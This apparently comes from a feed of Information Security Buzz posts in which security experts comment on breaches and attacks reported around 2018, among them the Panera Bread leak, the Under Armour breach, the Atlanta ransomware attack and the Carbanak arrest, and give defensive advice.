“This is one of those situations that should be an eye opener to people on the importance of reading before clicking OK. Unfortunately, data privacy is a lot like oral hygiene, everyone knows they should pay attention to it but in practice people tend to neglect it.

Many Facebook users are naturally upset about this situation, but in the end the moral of the story here is that people need to be more considerate about what data they are sharing and with whom.”

Travis Smith, Principle Security Researcher at Tripwire:

“There are a few areas of Facebook that people should be concerned with when trying to protect their privacy.  I would follow these steps in order, based off of the level of privacy you wish to have.

  1. Limit what you share on Facebook. There is no need to create a check in location at your house, where people can see your exact location, what valuables you have inside the house, and when you’re on vacation in Disneyland for a week.
  2. Make your profile private. I would recommend making anything you post on the social network be limited to the individuals you have accepted as friends.
  3. Limit what applications you give access to. When signing up for a new service, there’s a handy little “Join with Facebook” option many times. This can allow the creator of that website unfettered access to your profile. Similarly, clicking the various personality tests or similar apps gives the author a level of access that you may not even want your own family to have. The author of these games rarely, if ever, needs access to your profile. Be very wary about who you give access to, because once they have access once, the data can be taken and you cannot get it back.
  4. Monitor what applications have access to your profile currently.  Even though the applications already could have harvested everything from your profile, it’s wise to go through and make sure to keep the list clean.
  5. Don’t stop at Facebook. Every other service on the Internet has similar collection mechanisms about your private data. What you search for on Google, what YouTube videos you watch, what you search for and buy from Amazon; all of this is stored and can be used to profile you. Don’t assume that anything you do on the Internet is private, because it isn’t.

The ISBuzz Post: This Post Facebook Scandal Hit 87 Million Users appeared first on Information Security Buzz.

UK Businesses Financially Unprepared For Cyber Attacks

The ISBuzz Post: This Post UK Businesses Financially Unprepared For Cyber Attacks appeared first on Information Security Buzz.

Only a third of British businesses have a financial plan in place in case of a cyber attack, according to a survey at Lloyds Bank. Meanwhile, only half of companies discuss the risk of cyber attacks at board level.

The survey found that, if attacked, over a third of firms would pay a ransom to get their data back, but only a quarter had dedicated cyber insurance. IT security experts commented below.

Bill Evans, Senior Director at One Identity: 

“Recently Lloyd’s Bank released some rather disturbing facts regarding UK business’ willingness and ability to respond to a cyberattack.  Notably, it claims that only 33% have a financial plan in place in case of a cyberattack and only half discuss cyber risk at the board level.

This is a real miss.  Security must be a board level discussion.  One need only look across any variety of news reporting agencies to understand why.  Reasons to make this a board level discussion include GPDR violations with their hefty fines, damage to brand in the court of public opinion, and loss of revenue as customer confidence wanes in the wake of a breach.

As we talk with customers, one of the reasons they oftentimes give for not making security a board level discussion is that it doesn’t drive revenue or margin.  It’s viewed as a “cost of doing business” and not worthy of being discussed in the rarified air of “mahogany row.”  As a response, we like to remind them that there are two types of businesses; those that have been breached and those that are about to be.  Then we follow on with, “if you think security is expensive, try being unsecure.”

Javvad Malik, Security Advocate at AlienVault:

Javvad Malik“When it comes to cyber attacks, calculating the potential financial impact is something that needs to be undertaken well in advance. Companies should implement threat detection controls based on critical assets and data. This will ensure that any attack is spotted in a timely manner.

The second aspect is the response that should be taken once an incident occurs. Again, the response steps should be planned in advance and based on the criticality of assets and data. For example, if an asset that contained personal information is compromised, the response plan would include notifying the relevant regulatory body. But if a test environment was attacked, the response could be as simple as re-imaging the servers.

By having a plan in advance based on business and information criticality, the cost of security controls can be managed, as well as response plans.”

Dr Anton Grashion, Managing Director, Security Practice at Cylance:

“This is a recurring theme in surveys of businesses. Cybersecurity insurance is just one of the measures organisations can deploy to deal with risk and is often associated with the irreducible amount of risk that is resistant to the other strategies of mitigation, sharing, and avoidance. Because a disproportionate share of the cost of a breach is concentrated in the business implications rather than in all the technical/OPEX heavy responses to a breach is seems to make perfect sense that a great deal of effort should be concentrated on a prevention strategy first and foremost. While this has proved problematical in the past utilising legacy security tools, new AI and ML technologies can be deployed to stop the first domino from falling and thus proving the adage that an ounce of prevention is worth a pound of cure.”

The ISBuzz Post: This Post UK Businesses Financially Unprepared For Cyber Attacks appeared first on Information Security Buzz.

The Panera Bread Website Breach

The ISBuzz Post: This Post The Panera Bread Website Breach appeared first on Information Security Buzz.

Panera Breads’ website leaked customer information including names, addresses, birthdays, and the last four digits of credit cards for almost eight months before being discovered. IT security experts commented below.

Chris Olson, CEO at The Media Trust:

Chris Olson“Website breaches have become an epidemic that hurts corporate reputation and brand identity . The Panera website leak is just another example that demonstrates the complexity of security in the digital age. Be it poorly configured databases or unmanaged vendors, enterprises have a responsibility to do a better job controlling their digital ecosystems, especially when it comes to protecting consumer data. The ensuing damage to a brand’s image is costly. In today’s changing regulatory environments, enterprises need to update their vendor risk management strategies to include the digital environment, with specific attention paid to identifying all parties executing in websites and mobile apps. For most enterprises, this knowledge is limited to the software and hardware they purchase or license for use. Identification and control of these external resources is critical to developing a comprehensive security strategy for digital assets.”

Mounir Hahad, Head of Juniper Threat Labs at Juniper Networks:

“This kind of programming mistake is much more common than you would think. We highly advise website owners to perform penetration testing of their websites to identify these types of vulnerabilities as early as possible.

In the case of, the site had an open API that anyone on the internet could query and did not require any type of authentication. This API discloses the following information about customers who have previously registered on the website: username, first and last name, email address, phone number, birthday, last four digits of the credit card number, home address, social account, user preferences and dietary restrictions. This information can be queried if you know the phone number of the customer, which one could easily obtain using a second API.

This second API can be queried using a customer ID number to retrieve the username chosen, email address, first and last name, loyalty card number, phone number, full birth date and other options like SMS preferences, corporate customer status, etc. This API was easier to mine because sequential numbers were used as customer IDs.”

Paul Bischoff, privacy advocate at

“The leak is an inexcusable oversight that not only took far too long to fix, but should have never occurred in the first place. Customers’ names, email addresses, physical addresses, birthdays, and the last four digits of their credit cards were accessible for eight months. This was not a sophisticated breach by hackers. The unsecured database of millions of customers could easily be accessed via a web browser, and all the data was available in plain text, meaning thieves wouldn’t even have to both decrypting it.

This is a good example of why consumers need to be cautious about signing up for loyalty programs and similar promotional membership schemes. It’s very difficult or impossible to know whether a company takes your information security seriously and can competently handle it.”

The ISBuzz Post: This Post The Panera Bread Website Breach appeared first on Information Security Buzz.

US Gas Pipelines Hit By Cyberattacks

The ISBuzz Post: This Post US Gas Pipelines Hit By Cyberattacks appeared first on Information Security Buzz.

News broke that a  supply chain cyberattack has disrupted a chain of natural gas companies. It affected a software platform, developed by a company named Energy Services Group LLC, that is used to process customer transactions, according to Bloomberg News. Such data-exchange software is widely used in the gas industry, though the attack was limited to the Energy Services platform.

The attack on the billing platform impacted Texas-based Energy Transfer Partners LP, which owns more than 71,000 miles of pipelines containing natural gas, crude oil and other commodities. The Texas firm’s subsidiaries include the Panhandle Eastern Pipe Line Co., whose pipelines run from the Gulf Coast to the Midwest.  IT security experts commented below.

Andrea Carcano, Co-Founder and Chief Product Officer at Nozomi Networks:

“The supply chain cyberattack that disrupted a chain of natural gas companies serves as yet another reminder that oil and gas organizations are high-risk targets. Attacks against them are growing, as evidenced by the recent Ponemon study that shows that sixty-eight percent of oil and gas organizations have experienced at least one cyber compromise. In this case, operations were not ultimately impacted and it’s not immediately clear that they were the target – however, we know that attackers often use IT networks and third-party resources to gain entry to OT networks. That’s why organizations must ensure that IT and OT security efforts are effectively aligned to achieve the best possible protection.

Bob Noel, Director of Strategic Relationships and Marketing at Plixer:

“Critical infrastructure facilities should be on high alert that they are directly in the cross-hairs of bad actors and nation states. Legacy security approaches that have only focused on the perimeter have failed. It is imperative that these perimeter strategies be complimented with technologies like network traffic analysis (NTA) to scrutinize internal communications to strengthen their security posture. NTA collects data about every conversation on the network, runs advanced security algorithms to look for malicious activity in real-time, and provides historical forensic data to quickly identify the root cause in the event of a breach. Breaches are inevitable, so organizations must turn their focus to monitoring internal traffic and its behavior to protect themselves and the people who rely on their services.”

Tim Erlin, VP at Tripwire:

“Any doubt that critical energy infrastructure in the US is a target for cyber-attackers should be erased at this point. We’ve seen an increasing number of attacks, and increasingly successful attacks, across energy infrastructure.

Panic isn’t the answer to securing our critical infrastructure. Preparation and risk management are key.”

The ISBuzz Post: This Post US Gas Pipelines Hit By Cyberattacks appeared first on Information Security Buzz.

Panera Bread Website Leaks

The ISBuzz Post: This Post Panera Bread Website Leaks appeared first on Information Security Buzz.

It has been discovered that Panera Bread left the information of up to 37 million customers who signed up for delivery and other services including “names, email and physical addresses, birthdays and the last four digits of the customer’s credit card number” in plain text format accessible via its web site.IT security experts commented below.

Tim Erlin, VP, Product Management and Strategy at Tripwire:

“Security is often as much about response as prevention, and that includes how organizations respond to incidents and breaches. The market isn’t particularly forgiving when it comes to public incident response.

Organizations that collect, store and transmit customer data need to have plans in place to deal with reported vulnerabilities. The time to plan is before an incident occurs, not during.

Every publicly disclosed incident is an opportunity for unaffected organizations to consider how they would respond. Don’t just criticize the response; use the incident as a model for how your own organization might respond, and take steps to improve before it’s your name in the headline.”

Anthony James, Chief Marketing Officer at CipherCloud:

“MIllions of Panera Bread customer records potentially leaked, and most amazing, this went on for at least eight months according to KrebsOnSecurity. This breach is not unusual, and mirrors many recent headlines where mis-configurations occur, procedures may be missed, default passwords may still get used, ports will remain open to the internet, and, in this case, serious issues will somehow not be tracked and resolved. On a larger scale, can you even imagine that the thousands of alerts pouring into the average security operations center on their SIEM display are properly vetted every day? The moral of the story? Mistakes will be made and eventually they will become disastrous unless they are corrected or the data is protected along its entire lifecycle. What can others do to ensure that don’t become tomorrow’s headline? Add the necessary security layers to build Zero Trust into the systems automatically – meaning whatever data is being stored/used, expect it will be compromised. Anticipate that people will make mistakes and build out your cyber defense and your security policies to protect from a breach – your overall security will be stronger for it.”

Lisa Baergen, Director at NuData Security:

“The company names change but the stories remain the same:  Customers have had their information leaked because of the poor security procedures of companies transacting online, who continue to rely solely on plain text identifiers and static data such as credit card numbers, passwords and even simple customer names and phone numbers.

“The most proven and effective solutions for protecting customer are readily available and increasingly widely implemented:  multi-layered security solutions that incorporate verification via passive biometrics, without adding friction, by evaluating a consumer’s inherent behaviour online during the transaction process.  This field-proven approach lets the company confirm that a consumer is legitimate or a would-be fraudster before loss to the company can occur, even if the correct data – perhaps stolen – was used.  And it also prevents the company’s reliance on the sort of personally identifiable customer data that’s once again been leaked.  Ultimately, the shift to more advanced multi-layered solutions will, over time, render stolen information valueless to cybercriminals, as passive biometric verification defies use by third parties.”

Travis Smith, Principal Security Researcher at Tripwire:

“A company can spend millions on the latest and greatest security technologies and have the most impenetrable defenses known to man. But when you leave the front door open, none of that will matter.

“Unfortunately, the general public has breach fatigue. It seems like every day there’s another story about a different hack and a different breach of privacy. The reality is that most people will be outraged about this today, but next week they won’t even remember that it happened. Even if there was some sort of litigation, those who were affected can really only count on adding another year of free credit monitoring.

“While this is personally identifiable information, the sad fact is that the only real new piece of information attackers have now is that you like sandwiches. They can correlate that with your healthcare records, credit score, and social media profile to get a more accurate picture of who the real you is.”

Terry Ray, CTO at Imperva:

“It’s never a good day for companies when there is a proven data breach or data made available long-term, as the Federal Trade Commission can easily get involved and ask simple questions to which you don’t have complete answers.

“Was personal and credit card data exposed to the internet? Was any of it taken? How much data was stolen? Where did it go?  When was it taken?

“Law enforcement will need to find proof that data was stolen before levying fines or requiring identity theft protection for consumers, but past situations have shown that the FTC doesn’t have to find every record on the web, they just have to find some, then it’s up to the victim company to prove how many records were taken.  Also, I expect PCI regulators will question any PCI audits done since August looking for passes on application security, code review and code correction.

“Panera appears to have had an application security practice in place, so any investigation will likely spend time understanding what Panera monitored of normal versus abnormal activity, did they have a regularly scheduled security assessment run against their public websites, and did they correct poor coding practices once found.

“It seems at a minimum, they failed to either believe and test the first finding of this breach in August and quickly rectified the issue once it went public here in April.  They certainly appear capable of fixing the issue as they did quickly today, so why didn’t it happen in August when they were first alerted.”

Willy Leichter, Vice President of Marketing at Virsec:

“As Yogi Berra said, “this feels like déjà vu all over again.” Once again we see a large organization not taking security seriously enough, not reacting immediately when notified of a possible leak, and not promptly notifying customers that there data was exposed. Ongoing events like this will only heighten calls for a national standard on breach notification laws.”

The ISBuzz Post: This Post Panera Bread Website Leaks appeared first on Information Security Buzz.

Dark Web Price Index For Hacked Accounts

The ISBuzz Post: This Post Dark Web Price Index For Hacked Accounts appeared first on Information Security Buzz.

Cybersecurity experts with STEALTHbits, VASCO Data Security and NuData Security commented below on the recent Dark Web Market Price Index published by VPN ratings service’s consumer site “Privacy Central.” The index puts the price of a full online identity at $1,170, while hacked Uber, Airbnb and Netflix accounts go for $10 each, and hacked Grubhub, Walmart and Costco accounts go for between $5 and $10 each.

Ryan Wilk, Vice President of Customer Success at NuData Security: 

“Among all the personally identifiable information available on the web, the most valuable one is your complete online identity, as it includes data to access all your online accounts. It’s not surprising that each account, each type of data, or the whole package are sold online as if they were a pair of sneakers. Fraudsters work hard to get that information, and by reselling it, they are increasing its value, just like any other industry would do.”

“To fight this wave of exposed data, many forward-thinking retailers and other major organizations are adopting a multi-layered approach to verifying their users online – such as passive biometrics and behavioral analytics. This approach makes online accounts more secure as they can’t be accessed by bad actors, even if they present the right credentials.

Because these technologies don’t rely on static data, they are devaluing it and, ultimately, they can affect the value of stolen data on the dark market.”

“This approach to online verification that uses behavioral data signals to verify a user is allowing companies to avoid account takeover with stolen credentials and focus on their good customers.”

“This report is a good reminder of the importance of having a multi-layered security and also underscores that fraudsters are highly evolved and sophisticated criminal enterprises.”

David Vergara, Director – Security Product Marketing at VASCO Data Security:

“The key take-away from this report is that cybercriminals understand the business of monetizing stolen data along with the related level of effort and ROI. The level of sophistication is increasing rapidly. Phishing emails were once riddled with spelling errors and pop-ups that easily flagged them as un-professional and suspicious; This is no longer the case as even security aware individuals are falling prey to more “polished” schemes. Also, the volume of breached data, and number of individuals effected, means individuals should assume their personal information is exposed and proactively check credit reports and, for the strongest defensive measure, freeze credit with all the major credit bureaus. Lastly, consumers should take advantage of multi-factor authentication security when available and businesses should prioritize efforts to deploy this strong security.”

Jonathan Sander, CTO at STEALTHbits Technologies:

“People are often scared of bad guys getting their credit card numbers. The truth is that a small bit of awareness can protect you from nearly any credit card fraud. Most of the risk is actually on your credit card provider – as long as you monitor your bills and raise your hand when there is suspicious activity. If you use one of the higher end cards, they will do that for you. And you can also hook your credit cards up to services like Apple, Google, or Samsung payments and get alerts for each charge to ensure you see something off color right away.

“The bigger risk in these data black markets is the deadly combination of leaked passwords and lazy users. If someone gets your email password from a black market and you have never changed it, then they can use that “forgot your password” link on the credit card website to take over your account without ever paying a dime for your credit card number. Same for your bank account, Netflix, and just about everything else you use online that’s linked to your email. The bad guys who are really dangerous know that. Luckily, bad guys are about as lazy as the average person – because they are just people, too.”

The ISBuzz Post: This Post Dark Web Price Index For Hacked Accounts appeared first on Information Security Buzz.

150 Million Affected By Under Armour Data Breach

The ISBuzz Post: This Post 150 Million Affected By Under Armour Data Breach appeared first on Information Security Buzz.

In response to the news that Fitness Brand Under Armour has suffered a massive data breach affecting 150 million users, IT security experts commented below.

Terry Ray, CTO at Imperva:

“Most consumers are becoming a bit desensitized to data breaches, which have become common enough to barely make the news.  And if one breach makes news, there are ten that don’t.  In this case, it’s good that Under Armour detected the breach at all.  Many companies fail this first most important step.  Secondly, they at least used bcrypt for the passwords which is considerably more compute intensive than sha-1.  Unfortunately, using only sha-1 for usernames and email addresses is a problem.  For one, there are billions of already decrypted sha-1 hashes freely available on the web and cracking a new one doesn’t take too much effort.  This is why Under Armour took the appropriate steps to instruct users to change their passwords both on their site as well as any other site that uses those same usernames or email addresses.

I couldn’t agree more with the need for these users to change their passwords to something difficult to crack.  There are plenty of resources online that will help you create an effective password.   Anytime a leak of usernames or email addresses is made available, the anti-fraud technologies monitoring for fraudulent and failed logins see major activity spikes with large numbers of login attempts using known passwords and large password dictionaries.”

Evgeny Chereshnev, CEO and Founder at Biolink.Tech:

“150 million hacked accounts is hugely significant, especially because most users use the same pairs of logins and passwords across multiple sites. Hackers will break the weakest point; in this case a fitness tracker database, and they can use this information to access users’ emails, social networks and more.

When users are notified about changing passwords following a breach, more often than not they do so in a predictable way such as adding a 1 or a ! at the end, but these algorithms are known by hackers.They use machine learning and AI too – it’s not like that’s only available to the good guys, right?

Hackers can also match these stolen email addresses and passwords to other known databases of stolen credit card numbers, social security numbers, behavioural data bought from brokers etc. With this aggregated data, hackers can build up a pretty detailed profile of a user.

If these hackers were able to match these stolen login credentials to the users’ actual fitness data, just imagine what could happen. Having this level of data would allow hackers to know that Mr Smith has a very specific and predictable pattern of behaviour. Fitness trackers don’t only track calories and the number of steps a person walks in a day; it also knows where people are and at what time. For hackers wanting to specifically target a certain person, this data is a gold mine.”

Lisa Baergen, APR, MCC, Marketing Director at NuData Security:

“The re-use of passwords in situations like this may seem like short lapse in judgment, but this data that aligns names and email addresses with passwords is a potential disaster for anyone who reuses their passwords across multiple sites and accounts.

“On the other side, to combat online fraudulent transactions after the account data has been stolen, businesses offering services in the card-not-present (CNP) channel need to identify customers using multi-layered technologies that include passive biometrics. This technology monitors the user’s inherent behavior, making it impossible for hackers to replicate or steal. Leveraging a fully integrated multi-layered security approach that includes passive biometrics is an effective way to make stolen information valueless to the hacker and help stop fraud.”

“For now, anyone who thinks they may have reused their MyFitnessPal password on other sites needs to change each account password and track all account activity carefully.”

The ISBuzz Post: This Post 150 Million Affected By Under Armour Data Breach appeared first on Information Security Buzz.

Northern Ireland Assembly

The ISBuzz Post: This Post Northern Ireland Assembly appeared first on Information Security Buzz.

It has been reported that the Northern Ireland Assembly has issued warnings to staff following cyber attacks on its IT system. External hackers e attempted to access staff email accounts by brute-forcing passwords. IT security experts commented below.

Richard Walters, Cheif Security Strategist at CensorNet:

“This attack shows that it doesn’t matter who people are or where they work, basic cyber security practices are still being ignored. For years now, the advice has been: don’t reuse passwords across different sites and regularly change those passwords, yet for some reason, it isn’t sinking in. Even after a similar attack on the UK Parliament last year, the Northern Ireland Assembly and its staff clearly haven’t heeded the warnings.

“Given most people cannot be trusted to undertake basic security hygiene practices themselves, organisations – whether public or private – need to take steps to make them. If the Northern Ireland Assembly had, for example, had multi-factor authentication in place then it could rest easy that, even if a hacker did try and get in, they would have an impossible task accessing any information.”

Tony Pepper, CEO at Egress:

Tony Pepper“This attack against the Northern Ireland Assembly comes less than a year after a very similar attack on the Houses of Parliament. Both attacks have targeted email systems, trying to take advantage staffs’ weak passwords to gain access to sensitive information contained in mailboxes. Cyber criminals come back to this type of attack time and time again because human error is always the greatest area of weakness when it comes to cybersecurity.

“In this attack, and countless others, hackers were banking on poor security practices to help them through the door, such as weak or re-used passwords,and urging staff to update their credentials is simply not enough. Organisations, public or otherwise, need to put technologies and procedures in place to reduce the impact of human error. Should hackers find a weakness, organisations need to be confident that they can’t access the sensitive information that is shared via, and therefore stored in, email systems. For example, encryption that secures email content at rest is one way to protect critical assets should the worst happen and a hacker gain access. Good security should work with staff,accepting their behaviour will be unpredictable and helping them to be productive while making sure they are not letting cyber criminals access sensitive content, and in this case potentially putting the public at risk.”

The ISBuzz Post: This Post Northern Ireland Assembly appeared first on Information Security Buzz.

TalkTalk Urged To Improve Security

The ISBuzz Post: This Post TalkTalk Urged To Improve Security appeared first on Information Security Buzz.

It has been reported today that TalkTalk has been urged to improve its security after a researcher found a “Cross Site Scripting” error allowing him to take control of a convincing looking “” URL, which meant he could potentially trick any of the company’s webmail customers into thinking they were accessing an official TalkTalk website.

TalkTalk was apparently told about the flaw in March 2016 through a bug bounty program, however they only fixed it this week. In response to this piece of news, IT security experts commented below.

Ondrej Kubovic, Security Awareness Specialist at ESET:

“With the growing complexity of IT environments, the number of vulnerabilities that could be found and possibly misused by attackers, is growing every day.

This can make it increasingly difficult for IT teams to address all vulnerabilities immediately. With that said, it should be a top priority to patch known major vulnerabilities as soon as possible, especially if they affect public-facing company assets.

Leigh-Anne Galloway, Cyber Security Resilience Lead at Positive Technologies:

“Cross site scripting is a very serious vulnerability but what is more worrying is the response from TalkTalk. They have a duty of responsibility to their customer that is not only a corporate responsibility but is also mandated by regulation and legislation. Unfortunately this response, or lack there of, is much too common, which is why public disclosure is sometimes necessary. Security researchers responsibly disclosing flaws may actually put enough pressure on the company affected to close the vulnerability, thus protecting the public.”

Brooks Wallace, Managing Director EMEA at Trusted Knight:

“This is a relatively standard phishing exercise and, as is always advised, consumers need to be vigilant when logging into websites. TalkTalk might be of the belief that the risk presented to customers from the fake website was low, but the opposite is true. Any customer could easily have mistaken this site for the real one, entered their log-in details and then have them hoovered-up by the hacker to use on the real version. On top of that, people have a habit of using the same username and password across multiple sites, so the hackers could then have gone on to brute-force multiple sites.

“A fake website popping up is not necessarily the fault of a brand, but getting rid of it is their responsibility. A lot of businesses get caught out by security 101 issues and, despite the very public consequences, many are clearly still struggling with basic cybersecurity practices.”

The ISBuzz Post: This Post TalkTalk Urged To Improve Security appeared first on Information Security Buzz.

Leader Of $1 Billion By Hacking Gang Arrested

The ISBuzz Post: This Post Leader Of $1 Billion By Hacking Gang Arrested appeared first on Information Security Buzz.

In response to the news that the leader of the ring behind the infamous Carbanak malware, which caused ATMs to spit out cash and caused more than 1 billion euros of losses, has been arrested in Spain, IT security experts commented below.

Mark James, Security Specialist at ESET:

“Without specifics it’s hard to say how the actual investigations work, but often in these cases it could be that the individual concerned either made an error or was lured into a scenario that enabled law enforcement to track his or her whereabouts.

Internet anonymity is not as easy as it’s made out to be, it’s virtually impossible to be completely transparent in the digital universe especially if you are getting the attention of organisations worldwide. You also need help, many of the techniques shown here require others to physically be at the locations. With the widespread use visual tracking around these days it’s extremely difficult to move without being filmed somewhere especially in public places.

It’s unlikely that the money will be returned, some may if it’s able to be traced or stashed somewhere. The gangs have been working for a long time and money obtained this way has a nasty habit of being used for nefarious purposes or used to fund further bad actors.”

Ilia Kolochenko, CEO at High-Tech Bridge:

“I would remain cautiously optimistic about the news for several reasons.

First of all, it’s not crystal clear how the law enforcement agencies managed to identify and apprehend this person. Unfortunately, this arrest may not lead to mass arrests. Many cybercriminals use various methods to cover their identity in a reliable and technically untraceable manner, even among each other, so even the best investigators may not find them. Other cybercriminals, however, start exposing themselves in a pretty stupid manner, for example, by purchasing conspicuous luxury cars, boasting out loud about their criminal business in bars and casinos. Many of these hackers were caught mainly because of their imprudence and, unfortunately, not thanks to the technical capacity of our law enforcement agencies.

This case is rather an isolated arrest so far – many professional cybercriminals enjoy impunity and continue their illicit activities. Law enforcement agencies need more financial support from governments to conduct their investigatory and prosecution activities with more effectiveness and stronger results.

Last, but not least, the remaining cyber gangs will likely take additional precautionary measures to hinder and impede any pending investigations against them.”

Kaspersky Lab welcomes recent law enforcement operation against Carbanak group

“The recent success in the fight against the Carbanak cybercriminal group is very good news for the whole industry and highlights how the exchange of information between countries is especially important  in countering cybercrime,” says Sergey Golovanov, Principal Security Researcher in the Global Research & Analysis Team, Kaspersky Lab.

Carbanak is an advanced persistent threat (APT)-like campaign, using targeted attack tools to hit financial institutions around the world for the main purpose of theft.

It was uncovered in 2015 by Kaspersky Lab together with INTERPOL, Europol and a number of other law enforcement authorities based on incident back to 2013. At the time, the group was using a range of tools, including a program called Carbanak. After the publication of Kaspersky Lab’s findings in 2015, the group adapted its tools and started to use Cobalt-strike malware as well as its servers’ names and infrastructure.

The group uses social engineering techniques, such as phishing emails with malicious attachments (for example Word documents with embedded exploits), to target employees in financial institutions of interest. Once a victim is infected, the attackers install a backdoor designed for espionage, data theft and remote management of the infected system, looking for financial transaction systems.

At the time of discovery, Kaspersky Lab researchers estimated that the Carbanak group had stolen up to a $1 billion. Since 2013, the group has hit more than 100 banks, e-payment systems and other financial organizations, in at least 30 countries in Europe, Asia, North and South America, and other regions, stealing more than billions of dollars from victims.

Based on the successful research into Carbanak, in 2016, Kaspersky Lab discovered two groups acting in a very similar way to Carbanak – Metel and GCMAN. They were attacking financial organizations using covert APT-style reconnaissance and customized malware, along with legitimate software and new, innovative schemes to cash out. Other actors have also implemented Carbanak-like techniques, tactics and procedures, for instance Lazarus and Silence.

Given the international scale of these actors’ activities, we believe that there are dozens of people involved in this cybercrime activity. Discovered artefacts in the malicious files and victims’ computers suggest that the creators of the Carbanak malware are Russian-speaking. Although, to perform cybercriminal activities in each country the group generally also looked for a native speaker.

The ISBuzz Post: This Post Leader Of $1 Billion By Hacking Gang Arrested appeared first on Information Security Buzz.

City Of Atlanta Hit With Ransomware

The ISBuzz Post: This Post City Of Atlanta Hit With Ransomware appeared first on Information Security Buzz.

City of Atlanta has been hit by a ransomware attack, causing outages across internal and customer-facing applications. The cybercriminals are requesting a payment of $6,800 to unlock each computer or $51,000 for all of the needed keys. As of now, the city hasn’t paid and has assured citizens the systems will be restored soon. The FBI is currently investigating to find out who is responsible. You can view the tweet from the city here. IT security experts commented below.

Gijsbert Janssen Van Doorn, Technology Evangelist at Zerto:

“Without a data hostage, there is no ransom – that’s the technology mindset organizations, and city authorities such as Atlanta, need to adopt to protect themselves from ransomware. Prevention plans aren’t enough as attacks build in frequency and strength and are irreparable causing damage to brand reputation and increasing risk. Instead, organizations need to invest and create full IT resilience plans, including a disaster recovery infrastructure. Being able to easily and quickly recover data from mere seconds before it was lost or disrupted can save an organization time, money and many other types of damage.”

 Rob Tate, Security Researcher at WhiteHat Security:

“Ransomware is the new phishing attack. It’s a quick and easy win for bad guys that more than likely haven’t even breached your network. But the threat of bad press, reputation damage and fleeing customers is enough to incentivize companies to pay the ransom. This has caused a huge spike in ransomware threats. The bad guys aren’t dumb. They realize that there is this paranoia and fear, so it’s really easy to send an email saying ‘Send me 10 bitcoins/dollars or else,’ and inevitably, a few will actually cough up.

“Ransomware is just one specific attack scenario, and companies need to protect against ALL threats, not simply focus on a single issue. By performing a full vulnerability assessment and fixing the issues, you can protect your company from a far larger threat landscape. If 90 percent of your fence has already fallen over, what’s the use in trying to fix a hole in the 10 percent that’s left up? You need to protect against all threats, not one specific one.

“For the companies that are truly concerned about ransomware, in addition to vulnerability assessments, they can follow some easy industry best practices. Simply backing up your data and using up-to-date encryption will negate a lot of the risk of ransomware.”

The ISBuzz Post: This Post City Of Atlanta Hit With Ransomware appeared first on Information Security Buzz.

Iranian Hackers

The ISBuzz Post: This Post Iranian Hackers appeared first on Information Security Buzz.

Following the news that the US Justice Department announced charges against nine Iranians and an Iranian company for attempting to hack into hundreds of universities worldwide, dozens of companies and parts of the U.S. government, IT security experts commented below.

Gabriel Gumbs, Vice President at STEALTHbits Technologies:

“It is very difficult to quantify the frequency or impact of Nation State sponsored attacks, more importantly there is a lack of emphasis on the means by which these attacks are perpetrated. The consensus among security professionals is that passwords are a poor mechanism for securing data, and often when we hear about sophisticated attackers and their ability to penetrate systems and sensitive infrastructure the emphasis is placed on the attacker’s capabilities and less on the factors that allow skilled or unskilled attackers to be successful. A full eight percent of the targeted accounts had their credentials compromised – let’s not underestimate the attackers capabilities, however, let’s be clear that in all but a few cases, attackers prefer the path of least resistance and compromising credentials is still the preferred method.”

Sam Curry, CSO at Cybereason:

“Iran has committed a crime, and there’s a price to pay for that. This is a significant development for the government and other nation states should take notice that if you commit cyber crimes against the United States there is a price to pay for your actions. This is the first time our government has indicted a nation for being linked to the cyber intrusion of government offices, such as the Federal Energy Regulatory Commission and Department of Labor and that shouldn’t be overlooked.

“I expect the Iranian government to use a plausible deniability defense and claim that these rogue hacking groups aren’t affiliated with Tehran. Any nation state, Iran in this case, can say these were rogue groups, but when there is overwhelming proof, the circumstantial evidence can pile up. What’s also interesting about today’s indictments is that the 2015 nuclear deal struck between Iran, the US and six other countries lifted crippling economic sanctions in return for their disarmament of their nuclear weapon program. Many experts point toward this agreement as the main reason cyber attacks originating from Tehran have significantly diminished. But the DOJs announcement shows a nation that continued its hacking operations in the face of this agreement.

“When you are a “pariah nation” such as Iran you still have to keep information flowing because information is a lifeline. We now see that as a nation-state, Iran’s playbook is to ensure there is currency flowing and a flow of information. For the United States, this is a precedent in establishing the message on how we as a nation will deal with sanctions. We are a country who respects the rule of law, and with that, follow up matters.”

The ISBuzz Post: This Post Iranian Hackers appeared first on Information Security Buzz.

Atlanta Ransomware Attack

The ISBuzz Post: This Post Atlanta Ransomware Attack appeared first on Information Security Buzz.

As news broke today that the FBI is investigating a ransomware attack on the city of Atlanta that shut down city government systems, IT security experts commented below.

Israel Barak, Chief Information Security officer at Cybereason: 

If WannaCry, NotPetya and BadRabbit taught us anything in 2017 it is that ransomware attacks can have devastating effects on for profit organizations and consumers. Individually, the NotPetya attack cost organizations in access of $1.2 billion dollars. Globally, our estimates show that organizations and consumers paid more than $10 billion in ransoms in 2017.

While investigators explore the root cause of the ransomware attack in Atlanta, local and federal law enforcement agencies will piece together characteristics that show the tactics, techniques and procedures used to lock down many servers in Atlanta.

The best advice for organizations to prevent ransomware from victimizing their businesses is as follows:

  1. Maintain up to date backups of important files and regularly verify that the backups can be restored
  2. Refrain from downloading pirated software / paid software offered for ‘free.’
  3. Don’t download software from dubious sources.
  4. Don’t download key-gen / password cracking / license check removal software
  5. Don’t open email attachments from unknown / unexpected senders
  6. Deploy anti-malware and anti-ransomware tools

Sam Elliott, Director of Security Product Management at Atlanta-based Bomgar:

“Ransomware attacks are a reality for many businesses, and unfortunately, this instance is likely  not the last. However, there are steps organizations can take to protect themselves which includes adopting least privilege or zero trust security postures, implementing robust procedures for patching software and technologies against security vulnerabilities. Maintaining a regular patching routine closes potential holes in an organizations’ infrastructure, keeping attackers at bay. Infrastructure teams should also better segment their IT systems to prevent future malware from spreading laterally through connected networks, to prevent potential for extensive damage.”

Matt Walmsley, EMEA Director at Vectra:

“Ransomware spreads like wild fire, and is the most time critical of cyber threats. The ability to detect the pre-cursor behaviours if ransomware is the only way to get ahead of the attack. Unfortunately that’s almost impossible to do using traditional manual threat hunting techniques. That’s why forward thinking enterprises are increasingly using an automated approach, using AI powered threat detection. You need to detect and respond at machine speed.”

The ISBuzz Post: This Post Atlanta Ransomware Attack appeared first on Information Security Buzz.

Google Cloud Platform Security

The ISBuzz Post: This Post Google Cloud Platform Security appeared first on Information Security Buzz.

Following Google’s announcement today of new security features for the Google Cloud Platform, with the intent of giving businesses more control over their security environment, IT security experts commented below.

Anthony James, Chief Marketing Officer at CipherCloud:

